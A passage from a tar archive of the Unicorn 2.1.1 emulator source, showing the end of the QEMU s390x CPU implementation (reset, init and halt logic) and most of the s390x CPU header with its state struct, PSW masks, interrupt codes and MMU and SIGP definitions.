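Fields laid out before start_initial_reset_fields in CPUS390XState (GPRs, vector/FP registers, access registers, guarded-storage state) survive; the memset below only wipes the window between the start_initial_reset_fields and start_normal_reset_fields markers.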
*/ memset(&env->start_initial_reset_fields, 0, offsetof(CPUS390XState, start_normal_reset_fields) - offsetof(CPUS390XState, start_initial_reset_fields)); /* architectured initial value for Breaking-Event-Address register */ env->gbea = 1; /* architectured initial values for CR 0 and 14 */ env->cregs[0] = CR0_RESET; env->cregs[14] = CR14_RESET; /* tininess for underflow is detected before rounding */ set_float_detect_tininess(float_tininess_before_rounding, &env->fpu_status); /* fall through */ case S390_CPU_RESET_NORMAL: env->psw.mask &= ~PSW_MASK_RI; memset(&env->start_normal_reset_fields, 0, offsetof(CPUS390XState, end_reset_fields) - offsetof(CPUS390XState, start_normal_reset_fields)); env->pfault_token = -1UL; env->bpbc = false; break; default: g_assert_not_reached(); } } static void s390_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); S390CPU *cpu = S390_CPU(dev); /* the model has to be realized before qemu_init_vcpu() due to kvm */ // s390_realize_cpu_model(cs); /* sync cs->cpu_index and env->core_id. The latter is needed for TCG. */ cs->cpu_index = cpu->env.core_id; cpu_exec_realizefn(cs); qemu_init_vcpu(cs); cpu_reset(cs); } static void s390_cpu_initfn(struct uc_struct *uc, CPUState *obj) { CPUState *cs = CPU(obj); S390CPU *cpu = S390_CPU(obj); cpu_set_cpustate_pointers(cpu); cs->halted = 1; cs->exception_index = EXCP_HLT; // s390_cpu_model_register_props(obj); // cpu->env.tod_timer = // timer_new_ns(QEMU_CLOCK_VIRTUAL, s390x_tod_timer, cpu); // cpu->env.cpu_timer = // timer_new_ns(QEMU_CLOCK_VIRTUAL, s390x_cpu_timer, cpu); s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); cpu->env.uc = uc; } static unsigned s390_count_running_cpus(void) { return 1; } unsigned int s390_cpu_halt(S390CPU *cpu) { CPUState *cs = CPU(cpu); if (!cs->halted) { cs->halted = 1; cs->exception_index = EXCP_HLT; } return s390_count_running_cpus(); } void s390_cpu_unhalt(S390CPU *cpu) { CPUState *cs = CPU(cpu); if (cs->halted) { cs->halted = 0; cs->exception_index = -1; } } unsigned int s390_cpu_set_state(uint8_t cpu_state, S390CPU *cpu) { switch (cpu_state) { case S390_CPU_STATE_STOPPED: case S390_CPU_STATE_CHECK_STOP: /* halt the cpu for common infrastructure */ s390_cpu_halt(cpu); break; case S390_CPU_STATE_OPERATING: case S390_CPU_STATE_LOAD: /* * Starting a CPU with a PSW WAIT bit set: * KVM: handles this internally and triggers another WAIT exit. * TCG: will actually try to continue to run. Don't unhalt, will * be done when the CPU actually has work (an interrupt). 
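 * Hence the guard below: unhalt only when the PSW WAIT bit is clear.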
*/ if (!(cpu->env.psw.mask & PSW_MASK_WAIT)) { s390_cpu_unhalt(cpu); } break; default: //error_report("Requested CPU state is not a valid S390 CPU state: %u", // cpu_state); exit(1); } cpu->env.cpu_state = cpu_state; return s390_count_running_cpus(); } int s390_set_memory_limit(uint64_t new_limit, uint64_t *hw_limit) { return 0; } void s390_set_max_pagesize(uint64_t pagesize) { } void s390_cmma_reset(void) { } void s390_crypto_reset(void) { } void s390_enable_css_support(S390CPU *cpu) { } static void s390_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { S390CPUClass *scc = S390_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(scc); scc->reset = s390_cpu_reset; cc->has_work = s390_cpu_has_work; // cc->do_interrupt = s390_cpu_do_interrupt; cc->set_pc = s390_cpu_set_pc; cc->get_phys_page_debug = s390_cpu_get_phys_page_debug; cc->cpu_exec_interrupt = s390_cpu_exec_interrupt; cc->debug_excp_handler = s390x_cpu_debug_excp_handler; cc->do_unaligned_access = s390x_cpu_do_unaligned_access; cc->tcg_initialize = s390x_translate_init; cc->tlb_fill_cpu = s390_cpu_tlb_fill; // s390_cpu_model_class_register_props(oc); } S390CPU *cpu_s390_init(struct uc_struct *uc, const char *cpu_model) { S390CPU *cpu; CPUState *cs; CPUClass *cc; // int i; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_S390X_QEMU; // qemu-s390x-cpu } else if (uc->cpu_model > UC_CPU_S390X_MAX) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init CPUClass */ s390_cpu_class_init(uc, cc); // init skeys s390_skeys_init(uc); // init s390 models s390_init_cpu_model(uc, uc->cpu_model); /* init CPUState */ cpu_common_initfn(uc, cs); /* init CPU */ s390_cpu_initfn(uc, cs); /* realize CPU */ s390_cpu_realizefn(uc, cs); // init addresss space cpu_address_space_init(cs, 0, cs->memory); //qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu.h���������������������������������������������������������������0000664�0000000�0000000�00000067141�14675241067�0017300�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 virtual CPU header * * For details on the s390x architecture and used definitions (e.g., * PSW, PER and DAT (Dynamic Address Translation)), please refer to * the "z/Architecture Principles of Operations" - a.k.a. PoP. * * Copyright (c) 2009 Ulrich Hecht * Copyright IBM Corp. 2012, 2018 * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. 
*/ #ifndef S390X_CPU_H #define S390X_CPU_H #include "cpu-qom.h" #include "cpu_models.h" #include "exec/cpu-defs.h" #include "hw/s390x/storage-keys.h" #define ELF_MACHINE_UNAME "S390X" /* The z/Architecture has a strong memory model with some store-after-load re-ordering */ #define TCG_GUEST_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) #define TARGET_INSN_START_EXTRA_WORDS 2 #define MMU_USER_IDX 0 #define S390_MAX_CPUS 248 typedef struct PSW { uint64_t mask; uint64_t addr; } PSW; struct CPUS390XState { uint64_t regs[16]; /* GP registers */ /* * The floating point registers are part of the vector registers. * vregs[0][0] -> vregs[15][0] are 16 floating point registers */ uint64_t vregs[32][2] QEMU_ALIGNED(16); /* vector registers */ uint32_t aregs[16]; /* access registers */ uint64_t gscb[4]; /* guarded storage control */ uint64_t etoken; /* etoken */ uint64_t etoken_extension; /* etoken extension */ /* Fields up to this point are not cleared by initial CPU reset */ int start_initial_reset_fields; uint32_t fpc; /* floating-point control register */ uint32_t cc_op; bool bpbc; /* branch prediction blocking */ float_status fpu_status; /* passed to softfloat lib */ /* The low part of a 128-bit return, or remainder of a divide. */ uint64_t retxl; PSW psw; // S390CrashReason crash_reason; uint64_t cc_src; uint64_t cc_dst; uint64_t cc_vr; uint64_t ex_value; uint64_t __excp_addr; uint64_t psa; uint32_t int_pgm_code; uint32_t int_pgm_ilen; uint32_t int_svc_code; uint32_t int_svc_ilen; uint64_t per_address; uint16_t per_perc_atmid; uint64_t cregs[16]; /* control registers */ uint64_t ckc; uint64_t cputm; uint32_t todpr; uint64_t pfault_token; uint64_t pfault_compare; uint64_t pfault_select; uint64_t gbea; uint64_t pp; /* Fields up to this point are not cleared by normal CPU reset */ int start_normal_reset_fields; uint8_t riccb[64]; /* runtime instrumentation control */ int pending_int; uint16_t external_call_addr; DECLARE_BITMAP(emergency_signals, S390_MAX_CPUS); /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; uint32_t core_id; /* PoP "CPU address", same as cpu_index */ uint64_t cpuid; // QEMUTimer *tod_timer; // QEMUTimer *cpu_timer; /* * The cpu state represents the logical state of a cpu. In contrast to other * architectures, there is a difference between a halt and a stop on s390. * If all cpus are either stopped (including check stop) or in the disabled * wait state, the vm can be shut down. * The acceptable cpu_state values are defined in the CpuInfoS390State * enum. */ uint8_t cpu_state; /* currently processed sigp order */ uint8_t sigp_order; // Unicorn engine struct uc_struct *uc; }; static inline uint64_t *get_freg(CPUS390XState *cs, int nr) { return &cs->vregs[nr][0]; } /** * S390CPU: * @env: #CPUS390XState. * * An S/390 CPU. 
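 * Unlike upstream QEMU, the unicorn port embeds the class and the
 * storage-key class/state (the cc, skey and ss members below) directly
 * in the CPU object instead of allocating them through QOM.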
*/ struct S390CPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUS390XState env; S390CPUModel *model; /* needed for live migration */ // void *irqstate; // uint32_t irqstate_saved_size; // unicorn struct S390CPUClass cc; struct S390SKeysClass skey; struct QEMUS390SKeysState ss; }; /* distinguish between 24 bit and 31 bit addressing */ #define HIGH_ORDER_BIT 0x80000000 /* Interrupt Codes */ /* Program Interrupts */ #define PGM_OPERATION 0x0001 #define PGM_PRIVILEGED 0x0002 #define PGM_EXECUTE 0x0003 #define PGM_PROTECTION 0x0004 #define PGM_ADDRESSING 0x0005 #define PGM_SPECIFICATION 0x0006 #define PGM_DATA 0x0007 #define PGM_FIXPT_OVERFLOW 0x0008 #define PGM_FIXPT_DIVIDE 0x0009 #define PGM_DEC_OVERFLOW 0x000a #define PGM_DEC_DIVIDE 0x000b #define PGM_HFP_EXP_OVERFLOW 0x000c #define PGM_HFP_EXP_UNDERFLOW 0x000d #define PGM_HFP_SIGNIFICANCE 0x000e #define PGM_HFP_DIVIDE 0x000f #define PGM_SEGMENT_TRANS 0x0010 #define PGM_PAGE_TRANS 0x0011 #define PGM_TRANS_SPEC 0x0012 #define PGM_SPECIAL_OP 0x0013 #define PGM_OPERAND 0x0015 #define PGM_TRACE_TABLE 0x0016 #define PGM_VECTOR_PROCESSING 0x001b #define PGM_SPACE_SWITCH 0x001c #define PGM_HFP_SQRT 0x001d #define PGM_PC_TRANS_SPEC 0x001f #define PGM_AFX_TRANS 0x0020 #define PGM_ASX_TRANS 0x0021 #define PGM_LX_TRANS 0x0022 #define PGM_EX_TRANS 0x0023 #define PGM_PRIM_AUTH 0x0024 #define PGM_SEC_AUTH 0x0025 #define PGM_ALET_SPEC 0x0028 #define PGM_ALEN_SPEC 0x0029 #define PGM_ALE_SEQ 0x002a #define PGM_ASTE_VALID 0x002b #define PGM_ASTE_SEQ 0x002c #define PGM_EXT_AUTH 0x002d #define PGM_STACK_FULL 0x0030 #define PGM_STACK_EMPTY 0x0031 #define PGM_STACK_SPEC 0x0032 #define PGM_STACK_TYPE 0x0033 #define PGM_STACK_OP 0x0034 #define PGM_ASCE_TYPE 0x0038 #define PGM_REG_FIRST_TRANS 0x0039 #define PGM_REG_SEC_TRANS 0x003a #define PGM_REG_THIRD_TRANS 0x003b #define PGM_MONITOR 0x0040 #define PGM_PER 0x0080 #define PGM_CRYPTO 0x0119 /* External Interrupts */ #define EXT_INTERRUPT_KEY 0x0040 #define EXT_CLOCK_COMP 0x1004 #define EXT_CPU_TIMER 0x1005 #define EXT_MALFUNCTION 0x1200 #define EXT_EMERGENCY 0x1201 #define EXT_EXTERNAL_CALL 0x1202 #define EXT_ETR 0x1406 #define EXT_SERVICE 0x2401 #define EXT_VIRTIO 0x2603 /* PSW defines */ #undef PSW_MASK_PER #undef PSW_MASK_UNUSED_2 #undef PSW_MASK_UNUSED_3 #undef PSW_MASK_DAT #undef PSW_MASK_IO #undef PSW_MASK_EXT #undef PSW_MASK_KEY #undef PSW_SHIFT_KEY #undef PSW_MASK_MCHECK #undef PSW_MASK_WAIT #undef PSW_MASK_PSTATE #undef PSW_MASK_ASC #undef PSW_SHIFT_ASC #undef PSW_MASK_CC #undef PSW_MASK_PM #undef PSW_MASK_RI #undef PSW_SHIFT_MASK_PM #undef PSW_MASK_64 #undef PSW_MASK_32 #undef PSW_MASK_ESA_ADDR #define PSW_MASK_PER 0x4000000000000000ULL #define PSW_MASK_UNUSED_2 0x2000000000000000ULL #define PSW_MASK_UNUSED_3 0x1000000000000000ULL #define PSW_MASK_DAT 0x0400000000000000ULL #define PSW_MASK_IO 0x0200000000000000ULL #define PSW_MASK_EXT 0x0100000000000000ULL #define PSW_MASK_KEY 0x00F0000000000000ULL #define PSW_SHIFT_KEY 52 #define PSW_MASK_SHORTPSW 0x0008000000000000ULL #define PSW_MASK_MCHECK 0x0004000000000000ULL #define PSW_MASK_WAIT 0x0002000000000000ULL #define PSW_MASK_PSTATE 0x0001000000000000ULL #define PSW_MASK_ASC 0x0000C00000000000ULL #define PSW_SHIFT_ASC 46 #define PSW_MASK_CC 0x0000300000000000ULL #define PSW_MASK_PM 0x00000F0000000000ULL #define PSW_SHIFT_MASK_PM 40 #define PSW_MASK_RI 0x0000008000000000ULL #define PSW_MASK_64 0x0000000100000000ULL #define PSW_MASK_32 0x0000000080000000ULL #define PSW_MASK_SHORT_ADDR 0x000000007fffffffULL #define 
PSW_MASK_SHORT_CTRL 0xffffffff80000000ULL #undef PSW_ASC_PRIMARY #undef PSW_ASC_ACCREG #undef PSW_ASC_SECONDARY #undef PSW_ASC_HOME #define PSW_ASC_PRIMARY 0x0000000000000000ULL #define PSW_ASC_ACCREG 0x0000400000000000ULL #define PSW_ASC_SECONDARY 0x0000800000000000ULL #define PSW_ASC_HOME 0x0000C00000000000ULL /* the address space values shifted */ #define AS_PRIMARY 0 #define AS_ACCREG 1 #define AS_SECONDARY 2 #define AS_HOME 3 /* tb flags */ #define FLAG_MASK_PSW_SHIFT 31 #define FLAG_MASK_PER (PSW_MASK_PER >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_DAT (PSW_MASK_DAT >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_PSTATE (PSW_MASK_PSTATE >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_ASC (PSW_MASK_ASC >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_64 (PSW_MASK_64 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_32 (PSW_MASK_32 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_PSW (FLAG_MASK_PER | FLAG_MASK_DAT | FLAG_MASK_PSTATE \ | FLAG_MASK_ASC | FLAG_MASK_64 | FLAG_MASK_32) /* we'll use some unused PSW positions to store CR flags in tb flags */ #define FLAG_MASK_AFP (PSW_MASK_UNUSED_2 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_VECTOR (PSW_MASK_UNUSED_3 >> FLAG_MASK_PSW_SHIFT) /* Control register 0 bits */ #define CR0_LOWPROT 0x0000000010000000ULL #define CR0_SECONDARY 0x0000000004000000ULL #define CR0_EDAT 0x0000000000800000ULL #define CR0_AFP 0x0000000000040000ULL #define CR0_VECTOR 0x0000000000020000ULL #define CR0_IEP 0x0000000000100000ULL #define CR0_EMERGENCY_SIGNAL_SC 0x0000000000004000ULL #define CR0_EXTERNAL_CALL_SC 0x0000000000002000ULL #define CR0_CKC_SC 0x0000000000000800ULL #define CR0_CPU_TIMER_SC 0x0000000000000400ULL #define CR0_SERVICE_SC 0x0000000000000200ULL /* Control register 14 bits */ #define CR14_CHANNEL_REPORT_SC 0x0000000010000000ULL /* MMU */ #define MMU_PRIMARY_IDX 0 #define MMU_SECONDARY_IDX 1 #define MMU_HOME_IDX 2 #define MMU_REAL_IDX 3 static inline int cpu_mmu_index(CPUS390XState *env, bool ifetch) { if (!(env->psw.mask & PSW_MASK_DAT)) { return MMU_REAL_IDX; } if (ifetch) { if ((env->psw.mask & PSW_MASK_ASC) == PSW_ASC_HOME) { return MMU_HOME_IDX; } return MMU_PRIMARY_IDX; } switch (env->psw.mask & PSW_MASK_ASC) { case PSW_ASC_PRIMARY: return MMU_PRIMARY_IDX; case PSW_ASC_SECONDARY: return MMU_SECONDARY_IDX; case PSW_ASC_HOME: return MMU_HOME_IDX; case PSW_ASC_ACCREG: /* Fallthrough: access register mode is not yet supported */ default: abort(); } } static inline void cpu_get_tb_cpu_state(CPUS390XState* env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->psw.addr; *cs_base = env->ex_value; *flags = (env->psw.mask >> FLAG_MASK_PSW_SHIFT) & FLAG_MASK_PSW; if (env->cregs[0] & CR0_AFP) { *flags |= FLAG_MASK_AFP; } if (env->cregs[0] & CR0_VECTOR) { *flags |= FLAG_MASK_VECTOR; } } /* PER bits from control register 9 */ #define PER_CR9_EVENT_BRANCH 0x80000000 #define PER_CR9_EVENT_IFETCH 0x40000000 #define PER_CR9_EVENT_STORE 0x20000000 #define PER_CR9_EVENT_STORE_REAL 0x08000000 #define PER_CR9_EVENT_NULLIFICATION 0x01000000 #define PER_CR9_CONTROL_BRANCH_ADDRESS 0x00800000 #define PER_CR9_CONTROL_ALTERATION 0x00200000 /* PER bits from the PER CODE/ATMID/AI in lowcore */ #define PER_CODE_EVENT_BRANCH 0x8000 #define PER_CODE_EVENT_IFETCH 0x4000 #define PER_CODE_EVENT_STORE 0x2000 #define PER_CODE_EVENT_STORE_REAL 0x0800 #define PER_CODE_EVENT_NULLIFICATION 0x0100 #define EXCP_EXT 1 /* external interrupt */ #define EXCP_SVC 2 /* supervisor call (syscall) */ #define EXCP_PGM 3 /* program interruption */ #define EXCP_RESTART 4 /* restart interrupt */ #define EXCP_STOP 
5 /* stop interrupt */ #define EXCP_IO 7 /* I/O interrupt */ #define EXCP_MCHK 8 /* machine check */ #define INTERRUPT_EXT_CPU_TIMER (1 << 3) #define INTERRUPT_EXT_CLOCK_COMPARATOR (1 << 4) #define INTERRUPT_EXTERNAL_CALL (1 << 5) #define INTERRUPT_EMERGENCY_SIGNAL (1 << 6) #define INTERRUPT_RESTART (1 << 7) #define INTERRUPT_STOP (1 << 8) /* Program Status Word. */ #define S390_PSWM_REGNUM 0 #define S390_PSWA_REGNUM 1 /* General Purpose Registers. */ #define S390_R0_REGNUM 2 #define S390_R1_REGNUM 3 #define S390_R2_REGNUM 4 #define S390_R3_REGNUM 5 #define S390_R4_REGNUM 6 #define S390_R5_REGNUM 7 #define S390_R6_REGNUM 8 #define S390_R7_REGNUM 9 #define S390_R8_REGNUM 10 #define S390_R9_REGNUM 11 #define S390_R10_REGNUM 12 #define S390_R11_REGNUM 13 #define S390_R12_REGNUM 14 #define S390_R13_REGNUM 15 #define S390_R14_REGNUM 16 #define S390_R15_REGNUM 17 /* Total Core Registers. */ #define S390_NUM_CORE_REGS 18 static inline void setcc(S390CPU *cpu, uint64_t cc) { CPUS390XState *env = &cpu->env; env->psw.mask &= ~(3ull << 44); env->psw.mask |= (cc & 3) << 44; env->cc_op = cc; } /* STSI */ #define STSI_R0_FC_MASK 0x00000000f0000000ULL #define STSI_R0_FC_CURRENT 0x0000000000000000ULL #define STSI_R0_FC_LEVEL_1 0x0000000010000000ULL #define STSI_R0_FC_LEVEL_2 0x0000000020000000ULL #define STSI_R0_FC_LEVEL_3 0x0000000030000000ULL #define STSI_R0_RESERVED_MASK 0x000000000fffff00ULL #define STSI_R0_SEL1_MASK 0x00000000000000ffULL #define STSI_R1_RESERVED_MASK 0x00000000ffff0000ULL #define STSI_R1_SEL2_MASK 0x000000000000ffffULL /* Basic Machine Configuration */ typedef struct SysIB_111 { uint8_t res1[32]; uint8_t manuf[16]; uint8_t type[4]; uint8_t res2[12]; uint8_t model[16]; uint8_t sequence[16]; uint8_t plant[4]; uint8_t res3[3996]; } SysIB_111; QEMU_BUILD_BUG_ON(sizeof(SysIB_111) != 4096); /* Basic Machine CPU */ typedef struct SysIB_121 { uint8_t res1[80]; uint8_t sequence[16]; uint8_t plant[4]; uint8_t res2[2]; uint16_t cpu_addr; uint8_t res3[3992]; } SysIB_121; QEMU_BUILD_BUG_ON(sizeof(SysIB_121) != 4096); /* Basic Machine CPUs */ typedef struct SysIB_122 { uint8_t res1[32]; uint32_t capability; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint16_t adjustments[2026]; } SysIB_122; QEMU_BUILD_BUG_ON(sizeof(SysIB_122) != 4096); /* LPAR CPU */ typedef struct SysIB_221 { uint8_t res1[80]; uint8_t sequence[16]; uint8_t plant[4]; uint16_t cpu_id; uint16_t cpu_addr; uint8_t res3[3992]; } SysIB_221; QEMU_BUILD_BUG_ON(sizeof(SysIB_221) != 4096); /* LPAR CPUs */ typedef struct SysIB_222 { uint8_t res1[32]; uint16_t lpar_num; uint8_t res2; uint8_t lcpuc; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint8_t name[8]; uint32_t caf; uint8_t res3[16]; uint16_t dedicated_cpus; uint16_t shared_cpus; uint8_t res4[4020]; } SysIB_222; QEMU_BUILD_BUG_ON(sizeof(SysIB_222) != 4096); /* VM CPUs */ typedef struct SysIB_322 { uint8_t res1[31]; uint8_t count; struct { uint8_t res2[4]; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint8_t name[8]; uint32_t caf; uint8_t cpi[16]; uint8_t res5[3]; uint8_t ext_name_encoding; uint32_t res3; uint8_t uuid[16]; } vm[8]; uint8_t res4[1504]; uint8_t ext_names[8][256]; } SysIB_322; QEMU_BUILD_BUG_ON(sizeof(SysIB_322) != 4096); typedef union SysIB { SysIB_111 sysib_111; SysIB_121 sysib_121; SysIB_122 sysib_122; SysIB_221 sysib_221; SysIB_222 sysib_222; SysIB_322 sysib_322; } SysIB; QEMU_BUILD_BUG_ON(sizeof(SysIB) != 4096); /* MMU defines */ #define 
ASCE_ORIGIN (~0xfffULL) /* segment table origin */ #define ASCE_SUBSPACE 0x200 /* subspace group control */ #define ASCE_PRIVATE_SPACE 0x100 /* private space control */ #define ASCE_ALT_EVENT 0x80 /* storage alteration event control */ #define ASCE_SPACE_SWITCH 0x40 /* space switch event */ #define ASCE_REAL_SPACE 0x20 /* real space control */ #define ASCE_TYPE_MASK 0x0c /* asce table type mask */ #define ASCE_TYPE_REGION1 0x0c /* region first table type */ #define ASCE_TYPE_REGION2 0x08 /* region second table type */ #define ASCE_TYPE_REGION3 0x04 /* region third table type */ #define ASCE_TYPE_SEGMENT 0x00 /* segment table type */ #define ASCE_TABLE_LENGTH 0x03 /* region table length */ #define REGION_ENTRY_ORIGIN 0xfffffffffffff000ULL #define REGION_ENTRY_P 0x0000000000000200ULL #define REGION_ENTRY_TF 0x00000000000000c0ULL #define REGION_ENTRY_I 0x0000000000000020ULL #define REGION_ENTRY_TT 0x000000000000000cULL #define REGION_ENTRY_TL 0x0000000000000003ULL #define REGION_ENTRY_TT_REGION1 0x000000000000000cULL #define REGION_ENTRY_TT_REGION2 0x0000000000000008ULL #define REGION_ENTRY_TT_REGION3 0x0000000000000004ULL #define REGION3_ENTRY_RFAA 0xffffffff80000000ULL #define REGION3_ENTRY_AV 0x0000000000010000ULL #define REGION3_ENTRY_ACC 0x000000000000f000ULL #define REGION3_ENTRY_F 0x0000000000000800ULL #define REGION3_ENTRY_FC 0x0000000000000400ULL #define REGION3_ENTRY_IEP 0x0000000000000100ULL #define REGION3_ENTRY_CR 0x0000000000000010ULL #define SEGMENT_ENTRY_ORIGIN 0xfffffffffffff800ULL #define SEGMENT_ENTRY_SFAA 0xfffffffffff00000ULL #define SEGMENT_ENTRY_AV 0x0000000000010000ULL #define SEGMENT_ENTRY_ACC 0x000000000000f000ULL #define SEGMENT_ENTRY_F 0x0000000000000800ULL #define SEGMENT_ENTRY_FC 0x0000000000000400ULL #define SEGMENT_ENTRY_P 0x0000000000000200ULL #define SEGMENT_ENTRY_IEP 0x0000000000000100ULL #define SEGMENT_ENTRY_I 0x0000000000000020ULL #define SEGMENT_ENTRY_CS 0x0000000000000010ULL #define SEGMENT_ENTRY_TT 0x000000000000000cULL #define SEGMENT_ENTRY_TT_SEGMENT 0x0000000000000000ULL #define PAGE_ENTRY_0 0x0000000000000800ULL #define PAGE_ENTRY_I 0x0000000000000400ULL #define PAGE_ENTRY_P 0x0000000000000200ULL #define PAGE_ENTRY_IEP 0x0000000000000100ULL #define VADDR_REGION1_TX_MASK 0xffe0000000000000ULL #define VADDR_REGION2_TX_MASK 0x001ffc0000000000ULL #define VADDR_REGION3_TX_MASK 0x000003ff80000000ULL #define VADDR_SEGMENT_TX_MASK 0x000000007ff00000ULL #define VADDR_PAGE_TX_MASK 0x00000000000ff000ULL #define VADDR_REGION1_TX(vaddr) (((vaddr) & VADDR_REGION1_TX_MASK) >> 53) #define VADDR_REGION2_TX(vaddr) (((vaddr) & VADDR_REGION2_TX_MASK) >> 42) #define VADDR_REGION3_TX(vaddr) (((vaddr) & VADDR_REGION3_TX_MASK) >> 31) #define VADDR_SEGMENT_TX(vaddr) (((vaddr) & VADDR_SEGMENT_TX_MASK) >> 20) #define VADDR_PAGE_TX(vaddr) (((vaddr) & VADDR_PAGE_TX_MASK) >> 12) #define VADDR_REGION1_TL(vaddr) (((vaddr) & 0xc000000000000000ULL) >> 62) #define VADDR_REGION2_TL(vaddr) (((vaddr) & 0x0018000000000000ULL) >> 51) #define VADDR_REGION3_TL(vaddr) (((vaddr) & 0x0000030000000000ULL) >> 40) #define VADDR_SEGMENT_TL(vaddr) (((vaddr) & 0x0000000060000000ULL) >> 29) #define SK_C (0x1 << 1) #define SK_R (0x1 << 2) #define SK_F (0x1 << 3) #define SK_ACC_MASK (0xf << 4) /* SIGP order codes */ #define SIGP_SENSE 0x01 #define SIGP_EXTERNAL_CALL 0x02 #define SIGP_EMERGENCY 0x03 #define SIGP_START 0x04 #define SIGP_STOP 0x05 #define SIGP_RESTART 0x06 #define SIGP_STOP_STORE_STATUS 0x09 #define SIGP_INITIAL_CPU_RESET 0x0b #define SIGP_CPU_RESET 0x0c #define SIGP_SET_PREFIX 0x0d 
#define SIGP_STORE_STATUS_ADDR 0x0e #define SIGP_SET_ARCH 0x12 #define SIGP_COND_EMERGENCY 0x13 #define SIGP_SENSE_RUNNING 0x15 #define SIGP_STORE_ADTL_STATUS 0x17 /* SIGP condition codes */ #define SIGP_CC_ORDER_CODE_ACCEPTED 0 #define SIGP_CC_STATUS_STORED 1 #define SIGP_CC_BUSY 2 #define SIGP_CC_NOT_OPERATIONAL 3 /* SIGP status bits */ #define SIGP_STAT_EQUIPMENT_CHECK 0x80000000UL #define SIGP_STAT_NOT_RUNNING 0x00000400UL #define SIGP_STAT_INCORRECT_STATE 0x00000200UL #define SIGP_STAT_INVALID_PARAMETER 0x00000100UL #define SIGP_STAT_EXT_CALL_PENDING 0x00000080UL #define SIGP_STAT_STOPPED 0x00000040UL #define SIGP_STAT_OPERATOR_INTERV 0x00000020UL #define SIGP_STAT_CHECK_STOP 0x00000010UL #define SIGP_STAT_INOPERATIVE 0x00000004UL #define SIGP_STAT_INVALID_ORDER 0x00000002UL #define SIGP_STAT_RECEIVER_CHECK 0x00000001UL /* SIGP SET ARCHITECTURE modes */ #define SIGP_MODE_ESA_S390 0 #define SIGP_MODE_Z_ARCH_TRANS_ALL_PSW 1 #define SIGP_MODE_Z_ARCH_TRANS_CUR_PSW 2 /* SIGP order code mask corresponding to bit positions 56-63 */ #define SIGP_ORDER_MASK 0x000000ff /* machine check interruption code */ /* subclasses */ #define MCIC_SC_SD 0x8000000000000000ULL #define MCIC_SC_PD 0x4000000000000000ULL #define MCIC_SC_SR 0x2000000000000000ULL #define MCIC_SC_CD 0x0800000000000000ULL #define MCIC_SC_ED 0x0400000000000000ULL #define MCIC_SC_DG 0x0100000000000000ULL #define MCIC_SC_W 0x0080000000000000ULL #define MCIC_SC_CP 0x0040000000000000ULL #define MCIC_SC_SP 0x0020000000000000ULL #define MCIC_SC_CK 0x0010000000000000ULL /* subclass modifiers */ #define MCIC_SCM_B 0x0002000000000000ULL #define MCIC_SCM_DA 0x0000000020000000ULL #define MCIC_SCM_AP 0x0000000000080000ULL /* storage errors */ #define MCIC_SE_SE 0x0000800000000000ULL #define MCIC_SE_SC 0x0000400000000000ULL #define MCIC_SE_KE 0x0000200000000000ULL #define MCIC_SE_DS 0x0000100000000000ULL #define MCIC_SE_IE 0x0000000080000000ULL /* validity bits */ #define MCIC_VB_WP 0x0000080000000000ULL #define MCIC_VB_MS 0x0000040000000000ULL #define MCIC_VB_PM 0x0000020000000000ULL #define MCIC_VB_IA 0x0000010000000000ULL #define MCIC_VB_FA 0x0000008000000000ULL #define MCIC_VB_VR 0x0000004000000000ULL #define MCIC_VB_EC 0x0000002000000000ULL #define MCIC_VB_FP 0x0000001000000000ULL #define MCIC_VB_GR 0x0000000800000000ULL #define MCIC_VB_CR 0x0000000400000000ULL #define MCIC_VB_ST 0x0000000100000000ULL #define MCIC_VB_AR 0x0000000040000000ULL #define MCIC_VB_GS 0x0000000008000000ULL #define MCIC_VB_PR 0x0000000000200000ULL #define MCIC_VB_FC 0x0000000000100000ULL #define MCIC_VB_CT 0x0000000000020000ULL #define MCIC_VB_CC 0x0000000000010000ULL static inline uint64_t s390_build_validity_mcic(struct uc_struct *uc) { uint64_t mcic; /* * Indicate all validity bits (no damage) only. Other bits have to be * added by the caller. 
